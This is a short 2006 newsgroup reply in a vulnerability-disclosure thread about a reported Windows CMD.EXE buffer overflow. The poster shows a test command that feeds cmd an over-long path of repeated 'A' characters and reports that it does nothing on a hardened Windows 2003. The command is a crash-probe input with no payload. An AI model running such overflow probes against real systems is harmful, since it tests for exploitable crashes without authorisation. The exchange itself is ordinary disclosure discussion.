Re: Windows Command Processor CMD.EXE Buffer Overflow

Danux <[email protected]> Sun, 22 Oct 2006 17:24:42 -0500
Newsgroups gmane.comp.security.vulnerabilities
Message-ID <[email protected]>
It doesnt work on Windows 2003 without patches but hardened!!!

E:\Documents and Settings\danux>%COMSPEC% /K "dir \\?\AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

E:\Documents and Settings\danux>

Nothing happens!!!!

-- 
Danux, CISSP
Chief Information Security Officer
Macula Security Consulting Group
www.macula-group.com